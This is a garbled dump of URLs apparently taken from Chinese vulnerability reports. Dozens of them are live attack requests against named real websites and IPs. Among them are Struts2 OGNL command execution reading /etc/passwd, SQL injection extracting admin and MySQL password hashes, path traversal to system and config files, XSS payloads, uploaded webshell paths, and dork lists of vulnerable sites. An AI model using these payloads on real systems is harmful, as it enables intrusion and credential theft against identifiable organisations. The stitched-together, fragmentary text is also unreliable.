http://exchange.ztyb.com:8080/ztyb/index.htm http://support.woniu.com/ http://**.**.**/ http://**.**.**/ http://jhtj.crcc.cn/ www.51offer.com http://tongji.baidu.com/ http://yhds.dianxinos.com/confadmin/system/action.php?sAction=login_cookie&bLogin=true http://developer.baidu.com/ http://www.tijiangz.com/news.php?sortid=118 https://ssl.wahaha.com.cn http://222.172.223.248/login http://www.scddj.com/AboutUs.aspx?type=10 http://www.esairport.cn/ http://www.esairport.cn/admin/index.php,使用2#中得到的用户名密码登陆 http://www.esairport.cn/test77.php http://www.sgrd.gov.cn/website/portal/portalSiteAction.action http://www.bp.gov.cn/zizhan/index.php?cid=211,这里是个注入点 http://www.bp.gov.cn/zizhan/index.php?cid=211 http://www.bp.gov.cn/bpxt/feedback.php?type=2 http://www.bp.gov.cn/bpxt/feedback.php?type=2,再访问注入URL,我也不知道为什么 http://222.172.223.62/sqoa/default.aspx http://222.172.223.62/sqoa/OtherDoc/20141113091653cc37f8.aspx http://222.172.223.62/sqoa/OtherDoc/20141112184118152d2b.aspx cn:8080 http://hb.passport.189.cn:8080/AccountInfoQuery soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body http://hb.passport.189.cn:8080/ soap:Body soap:Envelope http://www.nj-hisense.com/company/zm/5/serch.asp?keywd=a&ft=news&userid=njhisense https://uhost.ucloud.cn/probe Cookie:NULL http://ip/`&probe_frequency=1&retry=+3&group_id%5B10844%5D=on&probe_type=1&use_session=yes&format=json®ion_id=5001&zone_id=1 http://www.tzzy.gov.cn/ https://222.38.1.47/Alarm/Public/Inc/这个里面找到数据库的密码,并且尝试了一下外网IP链接数据库,竟然链接成功 http://202.100.228.50/datagateway/index.action http://www.zjjs.net/detail.asp?id=159179 www.zjjs.net/detail.asp?id=159179 www.zjjs.net/detail.asp?id=159179 http://www.zjjs.net/admin/admin_login.asp?action=login hr.crcc.cn/admin http://www.90576.com/ http://demo.thinksns.com/t3/weiba http://bbs.amap.com/portal.php id.amap.com/interface/login inurl:aspx?tag inurl:NewListTag.aspx?tag http://www.ruczy.com/NewListTag.aspx?tag=%E5%B0%B1%E4%B8%9A http://www.xlxjy.com/NewListTag.aspx?tag=%E8%AF%81%E4%B9%A6 http://www.casshr.com/NewListTag.aspx?tag=%E5%B0%B1%E4%B8%9A http://www.rucsard.cn/Admin/Login/Login.aspx http://m.china-pub.com/and/zt_mb/zt_huodong_sj_1_more.asp?id=3742 http://m.china-pub.com/touch/zt_mb/zt_huodong_sj_1_more.asp?id=3741 http://bbs.chinaz.com/apple/add.txt http://q.51offer.com/q/98454.html http://www.changedu.com/ http://erp.suning.com.cn/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://wooyun.org/bugs/wooyun-2010-064567 http://203.195.195.247:9200/_plugin/head/ http://bbs1.iheima.com/ http://bbs1.iheima.com/uc_server/.svn/entries http://bbs1.iheima.com/uc_server/data/.svn/text-base/config.inc.php.svn-base http://bbs1.iheima.com/admin.php http://101.227.8.89/ http://101.227.8.89/user/list.do?name=&sEcho=5&iColumns=5&sColumns=&iDisplayStart=0&iDisplayLength=10&pageSize=1000¤tPage=1&mDataProp_0=id&mDataProp_1=name&mDataProp_2=loginName&mDataProp_3=lastLoginIp&mDataProp_4=lastLoginTime&_=1415855616795 http://101.227.8.89/.svn/entries http://www.metadata.com.cn/ http://zxks.gxeea.cn:8080/gxzkweb/Page/zyxxGetQueryResult.jsp?zhuanye=B020282 http://www.skysrt.com/ http://222.172.223.73/vip/userlogin http://222.172.223.73/vip/userlogin http://pa.jsict.com/globeyes/admin/index.jsp http://pa.jsict.com/globeyes/user/index.jsp http://pa.jsict.com/globeyes/admin/login.jsp?LoginName=1111&Password=1111&user_pw2=7156&rand=7186&platform=nanjing&login=suzhou http://www.jikexueyuan.com https://passport.jd.com http://jwxt.tzpc.edu.cn/kbcx_reg.asp http://jwgl.jhu.cn/kbcx_reg.asp http://222.187.199.60/kbcx_reg.asp http://221.226.83.60:8081/kbcx_reg.asp http://jwxt.nnutc.edu.cn/kbcx_reg.asp http://jwc.jljtxy.com.cn/kbcx_reg.asp http://jwcx.czie.net/kbcx_reg.asp http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/ http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0 www.hslib.gov.cn http://mall.51offer.com/order/my.html http://mall.51offer.com/order/info.html?orderCode=12014480081113 https://**.**.**/console/network/viewnetworkid=98183 http://admin.zndns.com/userAction!login.do?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29 https://github.com/qdayy/safeangel/blob/90de3a1f680bd0a018b2d1ba1cadbd7dde64c91e/api/send.php https://exmail.juhe.cn/ http://2014.juhe.cn:80/.git/config https://github.com/qdayy/2014.juhe http://dev.juhe.cn:80/.git/ https://github.com/kost/dvcs-ripper/tree/4e105c0217dbecdbcedc46eaa6861c31efc6ac3b http://2014.juhe.cn:80/.git/ http://2014.juhe.cn:80/.git/ http://shop.ehuatai.com/ inurl:/PublicFolder http://wsbgt.xaufe.edu.cn/PublicFolder/VideoList.aspx?level=4&TagID=10010808&type=catalog&userid=2 http://202.117.122.49/PublicFolder/VideoList.aspx?level=4&TagID=10010808&type=catalog&userid=2 http://122.206.110.3/adksvod/PublicFolder/VideoList.aspx?level=4&TagID=10010808&type=catalog&userid=2 http://mooc.dlteacher.com/ADKSVOD/PublicFolder/VideoList.aspx?level=4&TagID=10010808&type=catalog&userid=2 http://202.203.132.137/wsbgt/PublicFolder//VideoList.aspx?level=4&TagID=10010808&type=catalog&userid=2 www.henanjr.gov.cn http://125.46.11.50:9080/ http://117.139.75.25:8088/ http://tour.nihao8.net http://www.tanglv.com/LstInfo.asp?TT=2&SS=8&Id=48 http://www.yzgo588.com/LstInfo.asp?TT=2&SS=9&Id=47 http://www.jnhts.com/LstInfo.asp?TT=4&SS=118&Id=434 http://xmfits.com/LstInfo.asp?TT=2&SS=8&Id=12 http://hmlyly.com/LstInfo.asp?TT=22&SS=107&Id=350 http://www.xsbnyou.com/LstInfo.asp?TT=6&SS=110&Id=314 http://www.tongyoulm.com/LstInfo.asp?TT=2&SS=8&Id=734 http://pythn.net/LstInfo.asp?TT=2&SS=8&Id=48 http://jll0796.com/LstInfo.asp?TT=2&SS=9&Id=306 http://www.51yyw.com/LstInfo.asp?TT=2&SS=8&Id=589 http://tour.lygbst.cn/LstInfo.asp?TT=2&SS=9&Id=280 http://www.0537jg.com/LstInfo.asp?TT=7&SS=45&Id=242 http://www.langshanlvyou.com/LstInfo.asp?TT=2&SS=8&Id=47 http://tour.nihao8.net/LstInfo.asp?TT=2&SS=8&Id=48 http://www.bjadks.com/index.html inurl:/PublicFolder/VideoList.aspx?TagID= http://tour.nihao8.net http://tour.nihao8.net/Lstalone.asp?TT=14&SS=56 http://www.tongyoulm.com/Lstalone.asp?TT=3&SS=17 http://www.xsbnyou.com/Lstalone.asp?TT=3&SS=13 http://www.shambhalatrip.com/Lstalone.asp?TT=3&SS=12 http://www.0537jg.com/Lstalone.asp?TT=14&SS=54 http://www.langshanlvyou.com/Lstalone.asp?TT=3&SS=14 http://www.yzgo588.com/Lstalone.asp?TT=14&SS=57 http://www.51yyw.com/Lstalone.asp?TT=14&SS=54 http://pythn.net/Lstalone.asp?TT=14&SS=55 http://xmfits.com/Lstalone.asp?TT=3&SS=12 http://xm8383.com/Lstalone.asp?TT=4&SS=20 http://hmlyly.com/Lstalone.asp?TT=1&ss=1 http://www.jnhts.com/Lstalone.asp?TT=1&SS=1 http://tour.lygbst.cn/Lstalone.asp?TT=3&SS=14 http://www.cmseasy.org/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20%28select%20%28select%20concat%28username,0x3a,password%29%20from%20cdb_members%20limit%201%29%20%29%20from%20%60information_schema%60.tables%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23 http://tour.nihao8.net http://tour.nihao8.net/LstPrintInfo.asp?TT=2&SS=8&Id=48 http://hmlyly.com/LstPrintInfo.asp?TT=9&SS=161&Id=376 http://tour.lygbst.cn/LstPrintInfo.asp?TT=2&SS=9&Id=279 http://www.xsbnyou.com/LstPrintInfo.asp?TT=7&SS=121&Id=281 http://jll0796.com/LstPrintInfo.asp?TT=3&SS=100&Id=362 http://www.51yyw.com/LstPrintInfo.asp?TT=2&SS=8&Id=589 http://www.dzguolv.com/LstPrintInfo.asp?TT=3&SS=19&Id=984 http://182.254.145.235/mobile.php?act=entry&eid=4645&weid=1# http://m.jumei.com/i/MobileWap/pay/?batch_trade_number=s*******&gateway_name=&gateway=AlipayMobileWap&address_id=48218711&logistic_preference=&prefer_delivery_day= http://beta.moirai.immomo.com:5050 http://210.14.147.130/ http://shuju.menet.com.cn http://www.itceo.com/www/edata_article/edata_article_list.php?edata_type_id=2 http://shixi.189.cn http://×××××××××××shixibao/cp.php?ac=zhiwei_new&op=get_2&ignore=1&id=1%20union%20select%20user,host,3,password%20from%20mysql.user http://shixi.189.cn/shixibao/cp.php?ac=zhiwei_result_detail&ignore=1&jobid=8608%27 http://trust.pingan.com/downLoad.shtml?fileurl=../../../../../../../../etc/sysconfig/network&filename=network http://trust.pingan.com/downLoad.shtml?fileurl=../../../../../../../../etc/group&filename=group http://trust.pingan.com/downLoad.shtml?fileurl=../../../../../../../../etc/passwd&filename=passwd http://trust.pingan.com/downLoad.shtml?fileurl=../../../../../../../..//var/log/wtmp&filename=wtmp http://112.25.17.13/jsbims/login.action http://passport.jumei.com/Reset/setPass http://www.haitiansoft.com:8080/ http://erp.nepbaby.com:8080/oltp/account/login.aspx http://home.cofco.com/ www.haoshiku.com www.cofco.com www1.cofco.com http://idc.feng511.com http://wh.ip66.com/index.php网站下有个在线开通宽带的页面,即:http://wh.ip66.com/xinkai/ http://www.cnecora.com/class.aspx?id=17 http://www.ilovelohas.com.cn/upload/news/***00O.php http://www.htsec.com.hk/english/include/downloadFile.aspx页面对Name参数没有任何过滤导致任意文件下载漏洞 http://www.htsec.com.hk/english/include/downloadFile.aspx?Name=download/../../web.config http://www.mecare.cn/friend/find https://filippo.io/Heartbleed/#club.ehuatai.com https://filippo.io/Heartbleed/#219.141.242.47 http://211.147.17.137/ http://211.147.18.94/flex/index.html http://mail.tj.ct10000.com/webmail/client/cache/9/14119813809.jpg/2.php拿下的一句话 http://tmp.admin.51offer.com http://iufo.cofco.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://iufo.cofco.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease&TreeSelectedID=&TableSelectedID= http://www.goldlib.com.cn/ http://www.goldlib.com.cn/list.asp?classid=22 http://xxxx/HotBroow.aspx?Call=TH http://www.51offer.com/apply/upload.html页面上传后可以删除,抓包: http://lisms.mof.gov.cn/lisms/action/AddUserAction.do http://wooyun.org/bugs/wooyun-2014-083204/trace/8695520e3d8e4b928723b0ff49d09834) http://loudong.360.cn/vul/info/id/13768) http://www.56888.net/Video/VideoDetails.aspx?id=2 http://www.56888.net/Video/VideoDetails.aspx?id=2 https://github.com/xiaobailc/yapi_jms/blob/5c6a1482a91a6e35482e2ac27c5e07414ef243a5/activemq_receive.php http://exmail.qq.com/cgi-bin/loginpage?t=logindomain&f=biz¶m=liu.chang@icntv.tv http://gmis.nau.edu.cn/ http://gmis.nau.edu.cn/zsgl/login.aspx(以下截图均为此处) http://gmis.nau.edu.cn/zsgl/Fsgl/login.aspx http://baodian.women.sohu.com/Comment/ajax_add_comment http://www.itenable.com.cn/control/WebAPI/Search.news.inc.php http://icbc.mobilelottery.cn/ http://bbs.eos.changyou.com/uc_server/admin.php http://bbs.game.changyou.com/uc_server/admin.php http://bbs.ffo.changyou.com/uc_server/admin.php http://www.sxsjttzjz.gov.cn/program/htmledit/ewebeditor.asp?id=content1&style=standard_light2 http://121.31.56.50/userLogin.action http://61.50.254.40/thqm/searchCy.action http://www.haitiansoft.com:8080/ http://180.166.7.94/ZhuanTi/FolderDetails.asp?OAID=25 http://oa.tjfsu.edu.cn/ZhuanTi/FolderDetails.asp?OAID=25 http://www.fzsyxx.com/oa/ZhuanTi/FolderDetails.asp?OAID=25 http://vos.tjufe.edu.cn/ZhuanTi/FolderDetails.asp?OAID=25 http://www.shhjwl.com/vos/ZhuanTi/FolderDetails.asp?OAID=25 http://hi.bnet.cn/mLoginAction.do http://nc.womaiapp.com/ http://nc.womaiapp.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://nc.womaiapp.com/service/~iufo/com.ufida.web.action.ActionServlet?RefTargetId=m_strUnitCode&onlyTwo=false¶m_orgpk=level_code&retType=unit_code&Operation=Search&action=nc.ui.iufo.web.reference.base.UnitTableRefAction&method=execute file:///C:/xxxxxx,你会发现出现以下报错,F12控制台内 data:text/html,biduwebdata data:text/html,biduwebdata data:text/html,biduwebdata lighting.tcl.com/en/products-d.aspx?ID=-1+OR+17-7%3d10&SortID=101 http://lighting.tcl.com/en/about.aspx?id=-1+OR+17-7%3d10 http://lighting.tcl.com/en/service-center.aspx?id=-1+OR+17-7%3d10 http://lighting.tcl.com/cn/wl.asp?SortID=%2527 http://golf.cctv.com/e/ViewImg/index.html http://golf.cctv.com/e/ViewImg/index.html?url=javascript:alert%28/BMa/%29 http://www.ahtcnsh.com/index.html http://www.ahtcnsh.com/test78.php,本次测试没有造成任何破坏!为了了解博彩网站的机理,我下载了部分博彩网站源码,下面是我识别出来的博彩网站,你们可以删除掉的 http://abc.123/CsWX0p http://60.190.27.46/ https://112.91.176.90/ http://117.21.209.103:8080/account_login.xhtml http://help.wayos.cn//detail.php?hp_id=51%20and%201=2%20union%20select%201,concat%28user%28%29,0x20,database%28%29,0x20,version%28%29%29,3,4,5,6,7,8,9,10,11 http://61.144.54.46/ http://jinan.anjuke.com/community/view/656151 http://jwc.just.edu.cn/down/aspxspy1.aspx http://jwc.just.edu.cn/down/big.aspx http://jwc.just.edu.cn/down/com2.3.asp http://lmppda.liby.com.cn/masp/ http://58.63.253.42/portal/WEB-INF/web.xml http://58.63.253.42/portal/WEB-INF/config/pluto/pluto-portal-driver-services-config.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-basic.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-datasource.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-frame.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-pub.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-perm.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-setting.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-page.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-personal.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-portlet.xml http://58.63.253.42/portal/WEB-INF/config/spring/applicationContext-weibo.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-report.xml http://58.63.253.42/portal//WEB-INF/config/spring/applicationContext-sms.xml http://58.63.253.42/portal/WEB-INF/sso/applicationContext-ssoClient.xml http://58.63.253.42/eassso//WEB-INF/web.xml http://58.63.253.42/eassso//WEB-INF/applicationContext.xml http://58.63.253.42/easssoWEB-INF/deployerConfigContext.xml https://m.suning.com/mts-web/auth?ticket=STF8A1826F2C3D7FF854C32DBFE1F4E4A6&targetUrl=http%3A%2F%2Fwww.baidu.com%2F%3F1410879819.99 http://gzjn.gzlm.net/showvote.php?vid=1 http://pan.baidu.com/s/1mgzabxe,提取码:wtjz,解压密码:qqpoc123,为了达到最佳观看效果,请解压所有文件到同一目录下,打开qqpoc.html文件。 inurl:/ggxxfb.action?lmid= http://pan.baidu.com/s/1mgl2RHI,提取码:9nx9,解压密码:rxpoc123,为了达到最佳观看效果,请解压所有文件到同一目录下,打开rxpoc.html文件。 http://www.yum.com.cn:80/ www.yum.com.cn http://bf.zjstv.com/theVoice/ http://pan.baidu.com/s/1gdH1jI7,提取码:7pys,解压密码:jspoc123,为了达到最佳观看效果,请解压所有文件到同一目录下,打开jspoc.html文件。 www.zhuansoo.com http://222.35.36.136:8080/login.action http://192.168.*.*/portalReceiveAction.do?wlanuserip=用户的IP&wlanacname=这个可以自定义 http://192.168.*.*登录你的账号密码。 http://192.168.*.*/portalReceiveAction.do?wlanuserip=任意IP&wlanacname=目标IP所在网段的wlanacname,页面内会有wlanacip字段,相应修改wlanacname和wlanacip便可相应地伪造下线请求。 www.56888.net/Video/VideoDetails.aspx?id=1(重复) http://www.56888.net/Video/VideoDetails.aspx?id=1 http://www.56888.net/search/goodslist/?keywords=zz http://wb.56888.net/TenderListProject.aspx?&tendertype=2&g=cg&s=fh&c=fg http://wb.56888.net/TenderList.aspx?&tendertype=0&g=s&s=s www.81886.cn http://www.81886.cn/contact.asp?id=36 http://www.81886.cn/cases.asp?areaid=243 http://www.81886.cn/news_show.asp?id=123 http://www.scbzkjgg.com/contact.asp?id=4 http://www.ylhwj.com/Contact.asp?Id=11 http://lsjgkj.com/Contact.asp?Id=11 http://www.hyteng.com/contact.asp?id=4 http://szyoudun.com/contact.asp?id=4 http://www.hadadv.com/Contact.asp?Id=11 http://www.xkhfm.com/Contact.asp?Id=11 http://www.szwmk.com/contact.asp?id=4 http://www.yatengmotor.com/contact.asp?id=36 http://www.aidazs.com/contact.asp?id=4 http://www.szhsdjx.com/contact.asp?id=4 http://szjdjx.com/contact.asp?id=4 http://www.jsfscps.com/contact.asp?id=4 http://www.zoboh.com/contact.asp?id=4 http://www.dhcdhj.com/Contact.asp?Id=11 http://www.szsts168.com/contact.asp?id=4 http://www.xh2000.com/contact.asp?id=4 http://www.szbtsg.com/Contact.asp?Id=11 http://www.szysdnxh.com/Contact.asp?Id=11 http://szwbgs.com/contact.asp?id=4 http://holesh.com.cn/contact.asp?id=4 http://www.dgxxzsj.com/contact.asp?id=36 http://longxingfa888.com/contact.asp?id=4 http://www.holesh.com.cn/contact.asp?id=4 http://www.szwsdmj.com/contact.asp?id=36 http://www.yatengmotor.com/products.asp?areaid=237 http://www.szfwxpcb.com/products.asp?areaid=234 http://www.szpdxsp.com/products.asp?areaid=234 http://www.szsrmj.com/products.asp?areaid=243 http://www.flxchina.com.cn/products.asp?areaid=234 http://www.xianglong888.cn/products.asp?areaid=244 http://www.szhccnc.com/products.asp?areaid=247 http://www.xlyssz.com/products.asp?areaid=234 http://www.hongxinmold.com/products.asp?areaid=251 http://www.dgxxzsj.com/products.asp?areaid=273 http://www.hcxlyh.com/products.asp?areaid=245 http://www.szjh3d.com/products.asp?areaid=257 http://www.youzhutip.com/products.asp?areaid=255 http://www.szwsdmj.com/products.asp?areaid=250 http://www.yahuawujin.com/products.asp?areaid=262 http://www.yongkangtong.com/products.asp?areaid=255 http://chuangyaxin.net/products.asp?areaid=234 http://www.nengxingwujin.com/products.asp?areaid=285 http://sztfhs.com/products.asp?areaid=234 http://www.szysdnxh.com/NewsShow.asp?Id=27 http://www.szbtsg.com/NewsShow.asp?Id=63 http://www.szjh3d.com/news_show.asp?id=9 http://www.xlyssz.com/news_show.asp?id=9 http://www.flxchina.com.cn/news_show.asp?id=10 http://www.szwsdmj.com/news_show.asp?id=13 http://www.dgxxzsj.com/news_show.asp?id=370 http://www.yongkangtong.com/news_show.asp?id=13 http://www.szfwxpcb.com/news_show.asp?id=73 http://www.yatengmotor.com/news_show.asp?id=50 http://www.szpdxsp.com/news_show.asp?id=9 http://www.dhcdhj.com/NewsShow.asp?Id=69 http://www.szsrmj.com/news_show.asp?id=32 http://www.yahuawujin.com/news_show.asp?id=43 http://www.youzhutip.com/news_show.asp?id=99 http://www.hcxlyh.com/news_show.asp?id=9 http://www.xianglong888.cn/news_show.asp?id=9 http://www.szhccnc.com/news_show.asp?id=12 http://www.hongxinmold.com/news_show.asp?id=11 www.shandongweb.com/ inurl:job.php IP:115.28.6.127 http://218.22.66.214:8088/search_wh.aspx http://wooyun.org/bugs/wooyun-2014-080062是完全不同的注入点 http://www.chinaiov.com/login.jsp http://123.127.222.196/ content://com.letv.ads.db.AdsContentProvider/ads_tablable content://com.letv.ads.db.AdsContentProvider/ads_table content://com.letv.ads.db.AdsContentProvider/ads_table http://58.42.236.252:8080/Login!input.action inurl:about.asp?ncid= inurl:www http://wooyun.org/bugs/wooyun-2014-077356这里提交了修复后,无聊看了一下,虽然前端显示部分为***。但返回的数据包里面隐藏了完整的email地址。导致再次遍历用户邮箱账号。 http://daxue.imooc.com/.svn/entries http://svn.imooc.com/svn/edu/trunk/webroot http://svn.imooc.com/svn/edu http://daxue.imooc.com/tms/ http://daxue.imooc.com/sms http://daxue.imooc.com/cms http://daxue.imooc.com/oms http://www.wuxianapp.com/index.action http://121.40.126.244/wooyun.php index.php/aboutcque/1* http://www.cque.edu.cn:80/ www.cque.edu.cn http://www.51tv.com/51tv/dtl.jsp?id=757573754 http://ghy.swufe.edu.cn/test/web.aspx http://ghy.swufe.edu.cn/test/admin_login.asp http://ghy.swufe.edu.cn/test/UploadFile/20141115194054571.asp http://www.ghy.cn/wooyun.txt http://wqhy.coco.cn/wap/detail.php?id=10374 inurl:Product.asp http://www.efeng.net.cn/admin http://www.jhun.edu.cn/WList.asp?Category=%D1%A7%CA%F5%BD%BB%C1%F7 http://121.29.241.16/login.aspx http://search.js.cei.gov.cn/006_jjnews/search/detail_daily.php?id=38382&tal=a http://search.js.cei.gov.cn/ http://search.js.cei.gov.cn/phpMyAdmin/ http://search.js.cei.gov.cn/002_jszh/dbconfig/dbconf.inc http://search.js.cei.gov.cn/subeifz/phpinfo.php X-FORWARDED-FOR:127.0.0.1 http://124.225.213.50/ http://124.225.65.241/dol/ http://124.225.65.241/dol/dol/mdforum.jsp?keepThis=true&forumcode=210 http://www.zgbus.net/ http://www.zgbus.net/news_fw.php?typeid=4为例 http://www.zgbus.net/news_fw.php?typeid=4 http://www.zgbus.net/news_fw.php?typeid=4%20union%20select%201,admin_user,3,4,5,6,7,8,9,10 http://www.zgbus.net/news_fw.php?typeid=4%20union%20select%201,admin_pwd,3,4,5,6,7,8,9,10 http://www.zgbus.net/wooyun.txt http://www.hizyy.com/appointment.php?catid=88 http://www.hi-spider.com http://www.hi-spider.com/Index/support/id/877.html,伪静态 http://job.21wecan.com/rcjl/personal/resumeAction.do?us_id=1 http://xxxxxx/background/onlinemeetingstatus.php?ID=1 http://xxxxxx/background/sendsms.php?ID=1 http://xxxxxx/pub/bgtaskreq.php?svr=1 http://pan.baidu.com/s/1eQvO3hK,提取码:le6o,解压密码:kabapoc123,为了达到最佳观看效果,请解压所有文件到同一目录下,打开kabapoc.html文件。 http://www.atwasoft.com/p/views/customer.html hzsgjj.com/Website/newsshow.jsp?id=125 hzsgjj.com/Website/newsshow.jsp?id=125 http://www.xngjj.gov.cn/Website/newsshow.jsp?id=535 http://www.xngjj.gov.cn/Website/newsshow.jsp?id=535 http://mail.jxgzw.gov.cn/webmail/getPass1.php?email=jxsgzw@jxgzw.gov.cn&update=s http://mail.jxgzw.gov.cn/webmail/api/api.php?do=phpinfo inurl:about.aspx?mid= http://www.lyhnhotel.com/install/setup.aspx http://www.schlls.com/install/setup.aspx http://www.hscatv.com/install/setup.aspx http://www.gigi.com.cn/install/setup.aspx http://www.reachgroup.cn/install/setup.aspx http://www.oldmansion.cn/install/setup.aspx http://www.ztsd.cn/install/setup.aspx http://www.mxdl.com.cn/install/setup.aspx http://www.heleegroup.com/install/setup.aspx http://222.177.21.44:9082/oa inurl:/Magazine/NewMagazine.aspx http://www.jcadcg.com/Magazine/Default.aspx?year=2014&IssueID=1 http://www.jcadcg.com/Magazine/Defau http://sqlmap.org http://admin.zk-jxt.com http://www.jstu.sdnu.edu.cn/Magazine/NewMagazine.aspx?type=Viewnumber http://www.chinjpd.com/Magazine/NewMagazine.aspx?type=Viewnumber http://www.xdlchl.com/Magazine/NewMagazine.aspx?type=Viewnumber http://www.zhgysh.org/Magazine/NewMagazine.aspx?type=Viewnumber http://www.ywfxzz.cn/Magazine/NewMagazine.aspx?type=Viewnumber http://www.cjocp.com/Magazine/NewMagazine.aspx?type=ViewNumber http://zgrkkx.yywkt.cn/Magazine/NewMagazine.aspx?type=DownNumber http://210.73.83.157:7001/console/login/LoginForm.jsp http://210.73.83.157:7001/test/foot.jsp password:test inurl:news_show.asp?code= inurl:cp.asp?class= http://www.tayhhg.com/news_show.asp?code=wz0000000000060 http://www.ltfengtou.com/news_show.asp?code=wz0000000000076 http://www.tajxjx.com/news_show.asp?code=wz0000000000107 http://www.taishankuangj.com/news_show.asp?code=wz0000000000352 http://www.haojie163.com/news_show.asp?code=wz0000000000005 www.wxpangu.com inurl:products_s.asp?id= http://***.sina.com.cn/ http://***.sina.com.cn/uc_server/data/tmp/a_ok.php http://123.103.**.**/ http://123.103.**.**/static/space/t4/space.php http://**.video.sina.com.cn/ ie:ju***ie http://***.video.sina.com.cn/live5/index.php/login a1:lian***a1 http://202.108.*.**:8080/ http://202.106.**.**:8080/index.php http://202.108.**.**/ http://www.dy2018.com http://jxj.yn012.cn/student/login.jsp http://jxj.yn012.cn/student/appViewPublic.jsp?applyId=2398664&applyTypeId=1&publicType=school http://jxj.yn012.cn/student/appViewPublic.jsp?applyId=2111111&applyTypeId=1&publicType=school http://www.ce.zjut.edu.cn/Login!checkLogin.do http://202.102.41.235/mobileMS/ http://thedp.cn/thedp.rar http://thedp.cn/adthedp se://)的一些内容,都封装成了application/sogou-native-widget-plugin,因此,我们在这个协议下,要继续找到可用的XSS似乎比较困难。 se-extension://域下的XSS,由于搜狗浏览器内置的插件还比较多,挨个htm看一看,发现以下插件(截图插件)的页面存在XSS。 http://cms.nihao8.net/ http://cms.nihao8.net/LstPro.Asp?TT=2 http://www.zadoor.com/Lstpro.asp?TT=2 http://www.stxny.com/LstPro.Asp?TT=1 http://www.xbqkw.com/LstPro.asp?TT=2 http://www.hongsoftware.net/LstPro.asp?TT=5 http://www.scchigo.com/LstPro.Asp?TT=9 http://www.poshot.cn/LstPro.asp?TT=2 http://www.ccsiss.com/LstPro.asp?TT=1 http://121.14.62.19/OnDemand/loginAction.action http://121.14.62.19/OnDemand/loginAction.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D http://www.itsmv.com/ www.maticsoft.com http://shop.maticsoft.com/ http://shop1.maticsoft.cn/regionhandle.aspx inurl:Chanpin_L.asp?xx_chanpin_class_id= http://www.zhongshangwang.com/anli.asp http://www.jhsysb.cn/Chanpin_L.asp?xx_chanpin_class_id=75 http://www.lwtcwf.com/Chanpin_L.asp?xx_chanpin_class_id=90 http://www.ybcpfc.com:8000/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=6 http://www.ysfgj.com.cn/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=232 http://www.ybxfgj.cn/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=82 http://www.fqsjsj.com/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=3 http://www.ytfgs.com:8000/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=21 http://www.trfcj.com:8000/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=18 http://www.scglfc.com/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=41 http://wq.csjys.com/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=16 http://61.157.199.54:955/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=1539 http://www.klkfqjsj.com:8000/creditarchives/consumer/KFCorpbasicinfo.aspx?kfcode=3 http://www.ybcpfc.com:8000/creditarchives/consumer/TousuRecord.aspx?kfcode=46 http://218.89.55.8/creditarchives/consumer/TousuRecord.aspx?kfcode=6 http://61.157.199.54:955/creditarchives/consumer/TousuRecord.aspx?page=-1&&kfcode=1576 http://221.236.245.126:8000/creditarchives/consumer/TousuRecord.aspx?page=-1&&kfcode=17 http://125.64.228.44:8000/creditarchives/consumer/TousuRecord.aspx?kfcode=4 http://218.89.54.147/creditarchives/ShowPage.aspx?name=news&&id=9 http://221.10.67.197/creditarchives/ShowPage.aspx?name=news&&id=282 http://202.98.153.139/creditarchives/ShowPage.aspx?name=news&&id=1 http://www.scglfc.com/creditarchives/ShowPage.aspx?name=news&&id=41 http://218.89.138.170:955/creditarchives/ShowPage.aspx?name=news&&id=136 http://edit.buding.cn/cms/enter.php?product=../../../../../../../../../../etc/passwd%00.jpg http://edit.buding.cn/cms/enter.php?product=../../../../../../../../../..//home/yangyu/.bash_history%00.jpg 